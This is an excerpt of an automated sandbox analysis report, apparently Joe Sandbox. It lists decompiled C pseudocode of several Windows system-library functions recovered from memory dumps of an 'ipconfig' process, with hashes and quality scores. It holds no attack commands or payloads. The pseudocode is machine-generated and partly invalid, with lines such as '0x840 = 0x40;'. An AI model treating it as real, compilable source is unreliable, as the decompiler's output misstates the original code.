              • Opcode ID: fe1fb4d75054723ffea70cd92fb49ec6ffd13df7428a5689e5f62a7888d88d5e
              • Instruction ID: a9de15188a51025e63724ba416d7e1b274f955c1d56369e629e25e984d4af720
              • Opcode Fuzzy Hash: fe1fb4d75054723ffea70cd92fb49ec6ffd13df7428a5689e5f62a7888d88d5e
              • Instruction Fuzzy Hash: E6B15B74E40249DFDB19DFA8C9A4BEEFBB6BF84308F109129E505AB645D770A841CF50
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 67%
              			E02EC513A(intOrPtr __ecx, void* __edx) {
              				signed int _v8;
              				signed char _v16;
              				intOrPtr _v20;
              				intOrPtr _v24;
              				char _v28;
              				signed int _v32;
              				signed int _v36;
              				signed int _v40;
              				intOrPtr _v44;
              				intOrPtr _v48;
              				char _v63;
              				char _v64;
              				signed int _v72;
              				signed int _v76;
              				signed int _v80;
              				signed int _v84;
              				signed int _v88;
              				signed char* _v92;
              				signed int _v100;
              				signed int _v104;
              				char _v105;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				void* _t157;
              				signed int _t159;
              				signed int _t160;
              				unsigned int* _t161;
              				intOrPtr _t165;
              				signed int _t172;
              				signed char* _t181;
              				intOrPtr _t189;
              				intOrPtr* _t200;
              				signed int _t202;
              				signed int _t203;
              				char _t204;
              				signed int _t207;
              				signed int _t208;
              				void* _t209;
              				intOrPtr _t210;
              				signed int _t212;
              				signed int _t214;
              				signed int _t221;
              				signed int _t222;
              				signed int _t226;
              				intOrPtr* _t232;
              				signed int _t233;
              				signed int _t234;
              				intOrPtr _t237;
              				intOrPtr _t238;
              				intOrPtr _t240;
              				void* _t245;
              				signed int _t246;
              				signed int _t247;
              				void* _t248;
              				void* _t251;
              				void* _t252;
              				signed int _t253;
              				signed int _t255;
              				signed int _t256;
              
              				_t255 = (_t253 & 0xfffffff8) - 0x6c;
              				_v8 =  *0x2f8d360 ^ _t255;
              				_v32 = _v32 & 0x00000000;
              				_t251 = __edx;
              				_t237 = __ecx;
              				_t212 = 6;
              				_t245 =  &_v84;
              				_t207 =  *((intOrPtr*)(__ecx + 0x48));
              				_v44 =  *((intOrPtr*)(__edx + 0xc8));
              				_v48 = __ecx;
              				_v36 = _t207;
              				_t157 = memset(_t245, 0, _t212 << 2);
              				_t256 = _t255 + 0xc;
              				_t246 = _t245 + _t212;
              				if(_t207 == 2) {
              					_t247 =  *(_t237 + 0x60);
              					_t208 =  *(_t237 + 0x64);
              					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
              					_t159 =  *((intOrPtr*)(_t237 + 0x58));
              					_v104 = _t159;
              					_v76 = _t159;
              					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
              					_v100 = _t160;
              					_v72 = _t160;
              					L19:
              					_v80 = _t208;
              					_v84 = _t247;
              					L8:
              					_t214 = 0;
              					if( *(_t237 + 0x74) > 0) {
              						_t82 = _t237 + 0x84; // 0x124
              						_t161 = _t82;
              						_v92 = _t161;
              						while( *_t161 >> 0x1f != 0) {
              							_t200 = _v92;
              							if( *_t200 == 0x80000000) {
              								break;
              							}
              							_t214 = _t214 + 1;
              							_t161 = _t200 + 0x10;
              							_v92 = _t161;
              							if(_t214 <  *(_t237 + 0x74)) {
              								continue;
              							}
              							goto L9;
              						}
              						_v88 = _t214 << 4;
              						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
              						_t165 = 0;
              						asm("adc eax, [ecx+edx+0x7c]");
              						_v24 = _t165;
              						_v28 = _v40;
              						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
              						_t221 = _v40;
              						_v16 =  *_v92;
              						_v32 =  &_v28;
              						if( *(_t237 + 0x4e) >> 0xf == 0) {
              							goto L9;
              						}
              						_t240 = _v48;
              						if( *_v92 != 0x80000000) {
              							goto L9;
              						}
              						 *((intOrPtr*)(_t221 + 8)) = 0;
              						 *((intOrPtr*)(_t221 + 0xc)) = 0;
              						 *((intOrPtr*)(_t221 + 0x14)) = 0;
              						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
              						_t226 = 0;
              						_t181 = _t251 + 0x66;
              						_v88 = 0;
              						_v92 = _t181;
              						do {
              							if( *((char*)(_t181 - 2)) == 0) {
              								goto L31;
              							}
              							_t226 = _v88;
              							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
              								_t181 = E02EDD0F0(1, _t226 + 0x20, 0);
              								_t226 = _v40;
              								 *(_t226 + 8) = _t181;
              								 *((intOrPtr*)(_t226 + 0xc)) = 0;
              								L34:
              								if(_v44 == 0) {
              									goto L9;
              								}
              								_t210 = _v44;
              								_t127 = _t210 + 0x1c; // 0x1c
              								_t249 = _t127;
              								E02EB2280(_t181, _t127);
              								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
              								_t185 =  *((intOrPtr*)(_t210 + 0x94));
              								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
              									L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
              								}
              								_t189 = L02EB4620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
              								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
              								if(_t189 != 0) {
              									 *((intOrPtr*)(_t189 + 8)) = _v20;
              									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
              									_t232 =  *((intOrPtr*)(_t210 + 0x94));
              									 *_t232 = _t232 + 0x10;
              									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
              									E02EDF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
              									_t256 = _t256 + 0xc;
              								}
              								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
              								E02EAFFB0(_t210, _t249, _t249);
              								_t222 = _v76;
              								_t172 = _v80;
              								_t208 = _v84;
              								_t247 = _v88;
              								L10:
              								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
              								_v44 = _t238;
              								if(_t238 != 0) {
              									 *0x2f8b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
              									_v44();
              								}
              								_pop(_t248);
              								_pop(_t252);
              								_pop(_t209);
              								return E02EDB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
              							}
              							_t181 = _v92;
              							L31:
              							_t226 = _t226 + 1;
              							_t181 =  &(_t181[0x18]);
              							_v88 = _t226;
              							_v92 = _t181;
              						} while (_t226 < 4);
              						goto L34;
              					}
              					L9:
              					_t172 = _v104;
              					_t222 = _v100;
              					goto L10;
              				}
              				_t247 = _t246 | 0xffffffff;
              				_t208 = _t247;
              				_v84 = _t247;
              				_v80 = _t208;
              				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
              					_t233 = _v72;
              					_v105 = _v64;
              					_t202 = _v76;
              				} else {
              					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
              					_v105 = 1;
              					if(_v63 <= _t204) {
              						_v63 = _t204;
              					}
              					_t202 = _v76 |  *(_t251 + 0x40);
              					_t233 = _v72 |  *(_t251 + 0x44);
              					_t247 =  *(_t251 + 0x38);
              					_t208 =  *(_t251 + 0x3c);
              					_v76 = _t202;
              					_v72 = _t233;
              					_v84 = _t247;
              					_v80 = _t208;
              				}
              				_v104 = _t202;
              				_v100 = _t233;
              				if( *((char*)(_t251 + 0xc4)) != 0) {
              					_t237 = _v48;
              					_v105 = 1;
              					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
              						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
              						_t237 = _v48;
              					}
              					_t203 = _t202 |  *(_t251 + 0xb8);
              					_t234 = _t233 |  *(_t251 + 0xbc);
              					_t247 = _t247 &  *(_t251 + 0xb0);
              					_t208 = _t208 &  *(_t251 + 0xb4);
              					_v104 = _t203;
              					_v76 = _t203;
              					_v100 = _t234;
              					_v72 = _t234;
              					_v84 = _t247;
              					_v80 = _t208;
              				}
              				if(_v105 == 0) {
              					_v36 = _v36 & 0x00000000;
              					_t208 = 0;
              					_t247 = 0;
              					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
              					goto L19;
              				} else {
              					_v36 = 1;
              					goto L8;
              				}
              			}

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a082da9271aa32c8f58218ecb7f67b80a218d158992770f0597e88b43f2debf4
              • Instruction ID: d64a9596beae75b7f6370926fb935263e3bbfb4ef8a952a4f708b8de674d917f
              • Opcode Fuzzy Hash: a082da9271aa32c8f58218ecb7f67b80a218d158992770f0597e88b43f2debf4
              • Instruction Fuzzy Hash: 7BC123755093808FD354CF28C580A5AFBF1BF88348F148A6EF9999B392D771E945CB42
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 74%
              			E02EC03E2(signed int __ecx, signed int __edx) {
              				signed int _v8;
              				signed int _v12;
              				signed int _v16;
              				signed int _v20;
              				signed int _v24;
              				signed int _v28;
              				signed int _v32;
              				signed int _v36;
              				intOrPtr _v40;
              				signed int _v44;
              				signed int _v48;
              				char _v52;
              				char _v56;
              				char _v64;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				signed int _t56;
              				signed int _t58;
              				char* _t64;
              				intOrPtr _t65;
              				signed int _t74;
              				signed int _t79;
              				char* _t83;
              				intOrPtr _t84;
              				signed int _t93;
              				signed int _t94;
              				signed char* _t95;
              				signed int _t99;
              				signed int _t100;
              				signed char* _t101;
              				signed int _t105;
              				signed int _t119;
              				signed int _t120;
              				void* _t122;
              				signed int _t123;
              				signed int _t127;
              
              				_v8 =  *0x2f8d360 ^ _t127;
              				_t119 = __ecx;
              				_t105 = __edx;
              				_t118 = 0;
              				_v20 = __edx;
              				_t120 =  *(__ecx + 0x20);
              				if(E02EC0548(__ecx, 0) != 0) {
              					_t56 = 0xc000022d;
              					L23:
              					return E02EDB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
              				} else {
              					_v12 = _v12 | 0xffffffff;
              					_t58 = _t120 + 0x24;
              					_t109 =  *(_t120 + 0x18);
              					_t118 = _t58;
              					_v16 = _t58;
              					E02EAB02A( *(_t120 + 0x18), _t118, 0x14a5);
              					_v52 = 0x18;
              					_v48 = 0;
              					0x840 = 0x40;
              					if( *0x2f87c1c != 0) {
              					}
              					_v40 = 0x840;
              					_v44 = _t105;
              					_v36 = 0;
              					_v32 = 0;
              					if(E02EB7D50() != 0) {
              						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
              					} else {
              						_t64 = 0x7ffe0384;
              					}
              					if( *_t64 != 0) {
              						_t65 =  *[fs:0x30];
              						__eflags =  *(_t65 + 0x240) & 0x00000004;
              						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
              							_t100 = E02EB7D50();
              							__eflags = _t100;
              							if(_t100 == 0) {
              								_t101 = 0x7ffe0385;
              							} else {
              								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
              							}
              							__eflags =  *_t101 & 0x00000020;
              							if(( *_t101 & 0x00000020) != 0) {
              								_t118 = _t118 | 0xffffffff;
              								_t109 = 0x1485;
              								E02F17016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
              							}
              						}
              					}
              					_t105 = 0;
              					while(1) {
              						_push(0x60);
              						_push(5);
              						_push( &_v64);
              						_push( &_v52);
              						_push(0x100021);
              						_push( &_v12);
              						_t122 = E02ED9830();
              						if(_t122 >= 0) {
              							break;
              						}
              						__eflags = _t122 - 0xc0000034;
              						if(_t122 == 0xc0000034) {
              							L38:
              							_t120 = 0xc0000135;
              							break;
              						}
              						__eflags = _t122 - 0xc000003a;
              						if(_t122 == 0xc000003a) {
              							goto L38;
              						}
              						__eflags = _t122 - 0xc0000022;
              						if(_t122 != 0xc0000022) {
              							break;
              						}
              						__eflags = _t105;
              						if(__eflags != 0) {
              							break;
              						}
              						_t109 = _t119;
              						_t99 = E02F169A6(_t119, __eflags);
              						__eflags = _t99;
              						if(_t99 == 0) {
              							break;
              						}
              						_t105 = _t105 + 1;
              					}
              					if( !_t120 >= 0) {
              						L22:
              						_t56 = _t120;
              						goto L23;
              					}
              					if( *0x2f87c04 != 0) {
              						_t118 = _v12;
              						_t120 = E02F1A7AC(_t119, _t118, _t109);
              						__eflags = _t120;
              						if(_t120 >= 0) {
              							goto L10;
              						}
              						__eflags =  *0x2f87bd8;
              						if( *0x2f87bd8 != 0) {
              							L20:
              							if(_v12 != 0xffffffff) {
              								_push(_v12);
              								E02ED95D0();
              							}
              							goto L22;
              						}
              					}
              					L10:
              					_push(_v12);
              					_t105 = _t119 + 0xc;
              					_push(0x1000000);
              					_push(0x10);
              					_push(0);
              					_push(0);
              					_push(0xf);
              					_push(_t105);
              					_t120 = E02ED99A0();
              					if(_t120 < 0) {
              						__eflags = _t120 - 0xc000047e;
              						if(_t120 == 0xc000047e) {
              							L51:
              							_t74 = E02F13540(_t120);
              							_t119 = _v16;
              							_t120 = _t74;
              							L52:
              							_t118 = 0x1485;
              							E02E9B1E1(_t120, 0x1485, 0, _t119);
              							goto L20;
              						}
              						__eflags = _t120 - 0xc000047f;
              						if(_t120 == 0xc000047f) {
              							goto L51;
              						}
              						__eflags = _t120 - 0xc0000462;
              						if(_t120 == 0xc0000462) {
              							goto L51;
              						}
              						_t119 = _v16;
              						__eflags = _t120 - 0xc0000017;
              						if(_t120 != 0xc0000017) {
              							__eflags = _t120 - 0xc000009a;
              							if(_t120 != 0xc000009a) {
              								__eflags = _t120 - 0xc000012d;
              								if(_t120 != 0xc000012d) {
              									_v28 = _t119;
              									_push( &_v56);
              									_push(1);
              									_v24 = _t120;
              									_push( &_v28);
              									_push(1);
              									_push(2);
              									_push(0xc000007b);
              									_t79 = E02EDAAF0();
              									__eflags = _t79;
              									if(_t79 >= 0) {
              										__eflags =  *0x2f88474 - 3;
              										if( *0x2f88474 != 3) {
              											 *0x2f879dc =  *0x2f879dc + 1;
              										}
              									}
              								}
              							}
              						}
              						goto L52;
              					}
              					if(E02EB7D50() != 0) {
              						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
              					} else {
              						_t83 = 0x7ffe0384;
              					}
              					if( *_t83 != 0) {
              						_t84 =  *[fs:0x30];
              						__eflags =  *(_t84 + 0x240) & 0x00000004;
              						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
              							_t94 = E02EB7D50();
              							__eflags = _t94;
              							if(_t94 == 0) {
              								_t95 = 0x7ffe0385;
              							} else {
              								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
              							}
              							__eflags =  *_t95 & 0x00000020;
              							if(( *_t95 & 0x00000020) != 0) {
              								E02F17016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
              							}
              						}
              					}
              					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
              						if( *0x2f88708 != 0) {
              							_t118 =  *0x7ffe0330;
              							_t123 =  *0x2f87b00; // 0x0
              							asm("ror esi, cl");
              							 *0x2f8b1e0(_v12, _v20, 0x20);
              							_t93 =  *(_t123 ^  *0x7ffe0330)();
              							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
              							asm("sbb esi, esi");
              							_t120 =  ~_t50 & _t93;
              						} else {
              							_t120 = 0;
              						}
              					}
              					if( !_t120 >= 0) {
              						L19:
              						_push( *_t105);
              						E02ED95D0();
              						 *_t105 =  *_t105 & 0x00000000;
              						goto L20;
              					}
              					_t120 = E02EA7F65(_t119);
              					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
              						__eflags = _t120;
              						if(_t120 < 0) {
              							goto L19;
              						}
              						 *(_t119 + 0x64) = _v12;
              						goto L22;
              					}
              					goto L19;
              				}
              			}

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 81c32967e7df0bd4e6976ccff2792c154538d4a467957c3c11c33cfcd0d44768
              • Instruction ID: 573eb59a0ff10322453ecc0762f86c813e901b7b4a479c650e5874d9857e199f
              • Opcode Fuzzy Hash: 81c32967e7df0bd4e6976ccff2792c154538d4a467957c3c11c33cfcd0d44768
              • Instruction Fuzzy Hash: 44916A31E80218DFDB319BA8CD84BBEB7A5AB01798F155265EB11AB2D0D7309D01CB80
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 67%
              			E02E9C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
              				signed int _v8;
              				char _v1036;
              				signed int _v1040;
              				char _v1048;
              				signed int _v1052;
              				signed char _v1056;
              				void* _v1058;
              				char _v1060;
              				signed int _v1064;
              				void* _v1068;
              				intOrPtr _v1072;
              				void* _v1084;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				void* __ebp;
              				intOrPtr _t70;
              				intOrPtr _t72;
              				signed int _t74;
              				intOrPtr _t77;
              				signed int _t78;
              				signed int _t81;
              				void* _t101;
              				signed int _t102;
              				signed int _t107;
              				signed int _t109;
              				signed int _t110;
              				signed char _t111;
              				signed int _t112;
              				signed int _t113;
              				signed int _t114;
              				intOrPtr _t116;
              				void* _t117;
              				char _t118;
              				void* _t120;
              				char _t121;
              				signed int _t122;
              				signed int _t123;
              				signed int _t125;
              
              				_t125 = (_t123 & 0xfffffff8) - 0x424;
              				_v8 =  *0x2f8d360 ^ _t125;
              				_t116 = _a4;
              				_v1056 = _a16;
              				_v1040 = _a24;
              				if(E02EA6D30( &_v1048, _a8) < 0) {
              					L4:
              					_pop(_t117);
              					_pop(_t120);
              					_pop(_t101);
              					return E02EDB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
              				}
              				_t70 = _a20;
              				if(_t70 >= 0x3f4) {
              					_t121 = _t70 + 0xc;
              					L19:
              					_t107 =  *( *[fs:0x30] + 0x18);
              					__eflags = _t107;
              					if(_t107 == 0) {
              						L60:
              						_t68 = 0xc0000017;
              						goto L4;
              					}
              					_t72 =  *0x2f87b9c; // 0x0
              					_t74 = L02EB4620(_t107, _t107, _t72 + 0x180000, _t121);
              					_v1064 = _t74;
              					__eflags = _t74;
              					if(_t74 == 0) {
              						goto L60;
              					}
              					_t102 = _t74;
              					_push( &_v1060);
              					_push(_t121);
              					_push(_t74);
              					_push(2);
              					_push( &_v1048);
              					_push(_t116);
              					_t122 = E02ED9650();
              					__eflags = _t122;
              					if(_t122 >= 0) {
              						L7:
              						_t114 = _a12;
              						__eflags = _t114;
              						if(_t114 != 0) {
              							_t77 = _a20;
              							L26:
              							_t109 =  *(_t102 + 4);
              							__eflags = _t109 - 3;
              							if(_t109 == 3) {
              								L55:
              								__eflags = _t114 - _t109;
              								if(_t114 != _t109) {
              									L59:
              									_t122 = 0xc0000024;
              									L15:
              									_t78 = _v1052;
              									__eflags = _t78;
              									if(_t78 != 0) {
              										L02EB77F0( *( *[fs:0x30] + 0x18), 0, _t78);
              									}
              									_t68 = _t122;
              									goto L4;
              								}
              								_t110 = _v1056;
              								_t118 =  *((intOrPtr*)(_t102 + 8));
              								_v1060 = _t118;
              								__eflags = _t110;
              								if(_t110 == 0) {
              									L10:
              									_t122 = 0x80000005;
              									L11:
              									_t81 = _v1040;
              									__eflags = _t81;
              									if(_t81 == 0) {
              										goto L15;
              									}
              									__eflags = _t122;
              									if(_t122 >= 0) {
              										L14:
              										 *_t81 = _t118;
              										goto L15;
              									}
              									__eflags = _t122 - 0x80000005;
              									if(_t122 != 0x80000005) {
              										goto L15;
              									}
              									goto L14;
              								}
              								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
              								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
              									goto L10;
              								}
              								_push( *((intOrPtr*)(_t102 + 8)));
              								_t59 = _t102 + 0xc; // 0xc
              								_push(_t110);
              								L54:
              								E02EDF3E0();
              								_t125 = _t125 + 0xc;
              								goto L11;
              							}
              							__eflags = _t109 - 7;
              							if(_t109 == 7) {
              								goto L55;
              							}
              							_t118 = 4;
              							__eflags = _t109 - _t118;
              							if(_t109 != _t118) {
              								__eflags = _t109 - 0xb;
              								if(_t109 != 0xb) {
              									__eflags = _t109 - 1;
              									if(_t109 == 1) {
              										__eflags = _t114 - _t118;
              										if(_t114 != _t118) {
              											_t118 =  *((intOrPtr*)(_t102 + 8));
              											_v1060 = _t118;
              											__eflags = _t118 - _t77;
              											if(_t118 > _t77) {
              												goto L10;
              											}
              											_push(_t118);
              											_t56 = _t102 + 0xc; // 0xc
              											_push(_v1056);
              											goto L54;
              										}
              										__eflags = _t77 - _t118;
              										if(_t77 != _t118) {
              											L34:
              											_t122 = 0xc0000004;
              											goto L15;
              										}
              										_t111 = _v1056;
              										__eflags = _t111 & 0x00000003;
              										if((_t111 & 0x00000003) == 0) {
              											_v1060 = _t118;
              											__eflags = _t111;
              											if(__eflags == 0) {
              												goto L10;
              											}
              											_t42 = _t102 + 0xc; // 0xc
              											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
              											_v1048 =  *((intOrPtr*)(_t102 + 8));
              											_push(_t111);
              											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
              											_push(0);
              											_push( &_v1048);
              											_t122 = E02ED13C0(_t102, _t118, _t122, __eflags);
              											L44:
              											_t118 = _v1072;
              											goto L11;
              										}
              										_t122 = 0x80000002;
              										goto L15;
              									}
              									_t122 = 0xc0000024;
              									goto L44;
              								}
              								__eflags = _t114 - _t109;
              								if(_t114 != _t109) {
              									goto L59;
              								}
              								_t118 = 8;
              								__eflags = _t77 - _t118;
              								if(_t77 != _t118) {
              									goto L34;
              								}
              								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
              								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
              									goto L34;
              								}
              								_t112 = _v1056;
              								_v1060 = _t118;
              								__eflags = _t112;
              								if(_t112 == 0) {
              									goto L10;
              								}
              								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
              								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
              								goto L11;
              							}
              							__eflags = _t114 - _t118;
              							if(_t114 != _t118) {
              								goto L59;
              							}
              							__eflags = _t77 - _t118;
              							if(_t77 != _t118) {
              								goto L34;
              							}
              							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
              							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
              								goto L34;
              							}
              							_t113 = _v1056;
              							_v1060 = _t118;
              							__eflags = _t113;
              							if(_t113 == 0) {
              								goto L10;
              							}
              							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
              							goto L11;
              						}
              						_t118 =  *((intOrPtr*)(_t102 + 8));
              						__eflags = _t118 - _a20;
              						if(_t118 <= _a20) {
              							_t114 =  *(_t102 + 4);
              							_t77 = _t118;
              							goto L26;
              						}
              						_v1060 = _t118;
              						goto L10;
              					}
              					__eflags = _t122 - 0x80000005;
              					if(_t122 != 0x80000005) {
              						goto L15;
              					}
              					L02EB77F0( *( *[fs:0x30] + 0x18), 0, _t102);
              					L18:
              					_t121 = _v1060;
              					goto L19;
              				}
              				_push( &_v1060);
              				_push(0x400);
              				_t102 =  &_v1036;
              				_push(_t102);
              				_push(2);
              				_push( &_v1048);
              				_push(_t116);
              				_t122 = E02ED9650();
              				if(_t122 >= 0) {
              					__eflags = 0;
              					_v1052 = 0;
              					goto L7;
              				}
              				if(_t122 == 0x80000005) {
              					goto L18;
              				}
              				goto L4;
              			}

              Memory Dump Source
              • Source File: 0000000F.00000002.507309678.0000000002E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E70000, based on PE: true
              • Associated: 0000000F.00000002.507897502.0000000002F8B000.00000040.00000800.00020000.00000000.sdmp
              • Associated: 0000000F.00000002.507936751.0000000002F8F000.00000040.00000800.00020000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_15_2_2e70000_ipconfig.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4d5c34a10e7ce2889f24dba1d8cd157f3cb88d81ea60477fb561eb76fbabab25
              • Instruction ID: 8cdc10cb2067d8181c2d93ca046f144ca84cade371f9729078767dc4a090d911
              • Opcode Fuzzy Hash: 4d5c34a10e7ce2889f24dba1d8cd157f3cb88d81ea60477fb561eb76fbabab25
              • Instruction Fuzzy Hash: 9381B576A442458BCB11EE15C8D0B7BF3A5FB88394F14889AFE459B294D330FD41DB91
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 39%
              			E02F2B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
              				char _v8;
              				signed int _v12;
              				signed int _t80;
              				signed int _t83;
              				intOrPtr _t89;
              				signed int _t92;
              				signed char _t106;
              				signed int* _t107;
              				intOrPtr _t108;
              				intOrPtr _t109;
              				signed int _t114;
              				void* _t115;
              				void* _t117;
              				void* _t119;
              				void* _t122;
              				signed int _t123;
              				signed int* _t124;
              
              				_t106 = _a12;
              				if((_t106 & 0xfffffffc) != 0) {
              					return 0xc000000d;
              				}
              				if((_t106 & 0x00000002) != 0) {
              					_t106 = _t106 | 0x00000001;
              				}
              				_t109 =  *0x2f87b9c; // 0x0
              				_t124 = L02EB4620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
              				if(_t124 != 0) {
              					 *_t124 =  *_t124 & 0x00000000;
              					_t124[1] = _t124[1] & 0x00000000;
              					_t124[4] = _t124[4] & 0x00000000;
              					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
              						L13:
              						_push(_t124);
              						if((_t106 & 0x00000002) != 0) {
              							_push(0x200);
              							_push(0x28);
              							_push(0xffffffff);
              							_t122 = E02ED9800();
              							if(_t122 < 0) {
              								L33:
              								if((_t124[4] & 0x00000001) != 0) {
              									_push(4);
              									_t64 =  &(_t124[1]); // 0x4
              									_t107 = _t64;
              									_push(_t107);
              									_push(5);
              									_push(0xfffffffe);
              									E02ED95B0();
              									if( *_t107 != 0) {
              										_push( *_t107);
              										E02ED95D0();
              									}
              								}
              								_push(_t124);
              								_push(0);
              								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
              								L37:
              								L02EB77F0();
              								return _t122;
              							}
              							_t124[4] = _t124[4] | 0x00000002;
              							L18:
              							_t108 = _a8;
              							_t29 =  &(_t124[0x105]); // 0x414
              							_t80 = _t29;
              							_t30 =  &(_t124[5]); // 0x14
              							_t124[3] = _t80;
              							_t123 = 0;
              							_t124[2] = _t30;
              							 *_t80 = _t108;
              							if(_t108 == 0) {
              								L21:
              								_t112 = 0x400;
              								_push( &_v8);
              								_v8 = 0x400;
              								_push(_t124[2]);
              								_push(0x400);
              								_push(_t124[3]);
              								_push(0);
              								_push( *_t124);
              								_t122 = E02ED9910();
              								if(_t122 != 0xc0000023) {
              									L26:
              									if(_t122 != 0x106) {
              										L40:
              										if(_t122 < 0) {
              											L29:
              											_t83 = _t124[2];
              											if(_t83 != 0) {
              												_t59 =  &(_t124[5]); // 0x14
              												if(_t83 != _t59) {
              													L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
              												}
              											}
              											_push( *_t124);
              											E02ED95D0();
              											goto L33;
              										}
              										 *_a16 = _t124;
              										return 0;
              									}
              									if(_t108 != 1) {
              										_t122 = 0;
              										goto L40;
              									}
              									_t122 = 0xc0000061;
              									goto L29;
              								} else {
              									goto L22;
              								}
              								while(1) {
              									L22:
              									_t89 =  *0x2f87b9c; // 0x0
              									_t92 = L02EB4620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
              									_t124[2] = _t92;
              									if(_t92 == 0) {
              										break;
              									}
              									_t112 =  &_v8;
              									_push( &_v8);
              									_push(_t92);
              									_push(_v8);
              									_push(_t124[3]);
              									_push(0);
              									_push( *_t124);
              									_t122 = E02ED9910();
              									if(_t122 != 0xc0000023) {
              										goto L26;
              									}
              									L02EB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
              								}
              								_t122 = 0xc0000017;
              								goto L26;
              							}
              							_t119 = 0;
              							do {
              								_t114 = _t124[3];
              								_t119 = _t119 + 0xc;
              								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
              								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
              								_t123 = _t123 + 1;
              								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
              							} while (_t123 < _t108);
              							goto L21;
              						}
              						_push(0x28);
              						_push(3);
              						_t122 = E02E9A7B0();
              						if(_t122 < 0) {
              							goto L33;
              						}
              						_t124[4] = _t124[4] | 0x00000001;
              						goto L18;
